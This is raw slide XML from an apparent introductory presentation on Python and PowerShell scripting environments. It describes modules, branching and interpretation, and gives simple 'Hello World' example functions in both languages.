                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ements</a:t>
            </a:r>
            <a:endParaRPr sz="2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150"/>
              </a:spcBef>
            </a:pP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Branching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looping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statements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allow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compare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operators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control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blocks.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931289" y="4123944"/>
            <a:ext cx="12563475" cy="1558925"/>
            <a:chOff x="1931289" y="4123944"/>
            <a:chExt cx="12563475" cy="1558925"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="object 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1940814" y="4594098"/>
              <a:ext cx="12544425" cy="1079500"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1079500">
                  <a:moveTo>
                    <a:pt x="0" y="88646"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6975" y="54167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25987" y="25987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54167" y="6975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88646" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455398" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489876" y="6975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518056" y="25987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537068" y="54167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="88646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="990346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537068" y="1024824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518056" y="1053004"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489876" y="1072016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455398" y="1078991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88646" y="1078991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54167" y="1072016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25987" y="1053004"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6975" y="1024824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="990346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88646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952244" y="4123944"/>
              <a:ext cx="4320540" cy="544195"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4320540" h="544195">
                  <a:moveTo>
                    <a:pt x="4229861" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="90678" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55399" y="7131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26574" y="26574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7131" y="55399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="90677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="544067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320540" y="544067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320540" y="90677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4313408" y="55399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4293965" y="26574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4265140" y="7131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4229861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2137029" y="4937886"/>
            <a:ext cx="817435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Python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has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libraries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functions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accomplish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standard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tasks.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37029" y="4160266"/>
            <a:ext cx="114744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Modu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es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967864" y="5923788"/>
            <a:ext cx="12563475" cy="1560195"/>
            <a:chOff x="1967864" y="5923788"/>
            <a:chExt cx="12563475" cy="1560195"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="object 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1977389" y="6393942"/>
              <a:ext cx="12544425" cy="1080770"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1080770">
                  <a:moveTo>
                    <a:pt x="0" y="88772"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6977" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88773" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455271" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="88772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="991742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455271" y="1080515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88773" y="1080515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6977" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="991742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88772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988819" y="5923788"/>
              <a:ext cx="4320540" cy="480059"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4320540" h="480060">
                  <a:moveTo>
                    <a:pt x="4240530" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="80010" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48863" y="6286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23431" y="23431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6286" y="48863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="80010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="480060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320540" y="480060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320540" y="80010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4314253" y="48863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4297108" y="23431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4271676" y="6286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4240530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2173604" y="5992748"/>
            <a:ext cx="11431270" cy="13874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5">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Execution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12700" marR="5080">
              <a:lnSpc>
                <a:spcPct val="100499"/>
              </a:lnSpc>
            </a:pP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Python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interpreted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compiled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language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executed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within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context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binary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Python</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-3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process.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25159" y="306451"/>
            <a:ext cx="480758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75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Python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20">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Script</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-6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90">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Environment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26508" y="760476"/>
            <a:ext cx="6588252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556759" y="3063239"/>
            <a:ext cx="7751445" cy="3168650"/>
            <a:chOff x="4556759" y="3063239"/>
            <a:chExt cx="7751445" cy="316865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11623" y="3063239"/>
              <a:ext cx="7696200" cy="316839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56759" y="3453383"/>
              <a:ext cx="6972300" cy="21717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663439" y="3113531"/>
              <a:ext cx="7571740" cy="3045460"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="7571740" h="3045460">
                  <a:moveTo>
                    <a:pt x="7571231" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="3044952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7571231" y="3044952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7571231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663439" y="3113531"/>
              <a:ext cx="7571740" cy="3045460"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="7571740" h="3045460">
                  <a:moveTo>
                    <a:pt x="0" y="3044952"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7571231" y="3044952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7571231" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="3044952"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="952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4743069" y="3532073"/>
            <a:ext cx="6577965" cy="18561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Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-15">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>fullname(name,surname):</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="1376045" indent="45720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latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>return name </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>+ " " + </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>surname </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>#This ends the function definition </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-1190">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>#The</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-10">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>next line calls</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-10">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>the function</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>greeting </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>'Hello </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>' + </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>fullname('World', '') </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-1190">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>print(greeting)</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New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602479" y="2863621"/>
            <a:ext cx="7717790" cy="3439795"/>
            <a:chOff x="4602479" y="2863621"/>
            <a:chExt cx="7717790" cy="343979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02479" y="2863621"/>
              <a:ext cx="7717535" cy="45565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648199" y="2909315"/>
              <a:ext cx="7603490" cy="341630"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="7603490" h="341630">
                  <a:moveTo>
                    <a:pt x="7509509" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="93725" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57221" y="7358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27432" y="27432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7358" y="57221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="93725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="341375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7603235" y="341375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7603235" y="93725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7595877" y="57221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7575804" y="27432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7546014" y="7358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7509509" y="0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02479" y="6112713"/>
              <a:ext cx="7717535" cy="19042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648199" y="6158483"/>
              <a:ext cx="7603490" cy="76200"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="7603490" h="76200">
                  <a:moveTo>
                    <a:pt x="7603235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7603235" y="76200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7603235" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="5396D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5547105" y="1933193"/>
            <a:ext cx="556704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samp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Pytho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scrip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ca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see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below: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70067" y="306451"/>
            <a:ext cx="55168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40">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>PowerShell</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-4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20">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Script</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-5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85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Environment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83608" y="760476"/>
            <a:ext cx="7415784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235196" y="5372100"/>
            <a:ext cx="7751445" cy="3168650"/>
            <a:chOff x="4235196" y="5372100"/>
            <a:chExt cx="7751445" cy="316865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90060" y="5372100"/>
              <a:ext cx="7696200" cy="31683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5196" y="5503163"/>
              <a:ext cx="7429500" cy="27813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341876" y="5422392"/>
              <a:ext cx="7571740" cy="3045460"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="7571740" h="3045459">
                  <a:moveTo>
                    <a:pt x="7571232" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="3044951"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7571232" y="3044951"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7571232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341876" y="5422392"/>
              <a:ext cx="7571740" cy="3045460"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="7571740" h="3045459">
                  <a:moveTo>
                    <a:pt x="0" y="3044951"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7571232" y="3044951"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7571232" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="3044951"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="952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4421504" y="5583427"/>
            <a:ext cx="7036434" cy="2465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17500" marR="3357879" indent="-304800">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="50">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Cat-Name</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="50">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>{ </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>param</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-50">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>($name,$surname)</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="317500">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-10">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$name </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> $surname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ts val="2375"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2000">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="158750">
              <a:lnSpc>
                <a:spcPts val="2450"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="15"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>#This ends</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>declaration; the</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>next </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-1185">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>statement</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-10">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>calls it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ts val="2310"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$greeting </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>'Hello </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>' +</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> $(Cat-Name('World',''))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2000" spc="-5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Write-Host</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-40">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$greeting</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Courier New"/>
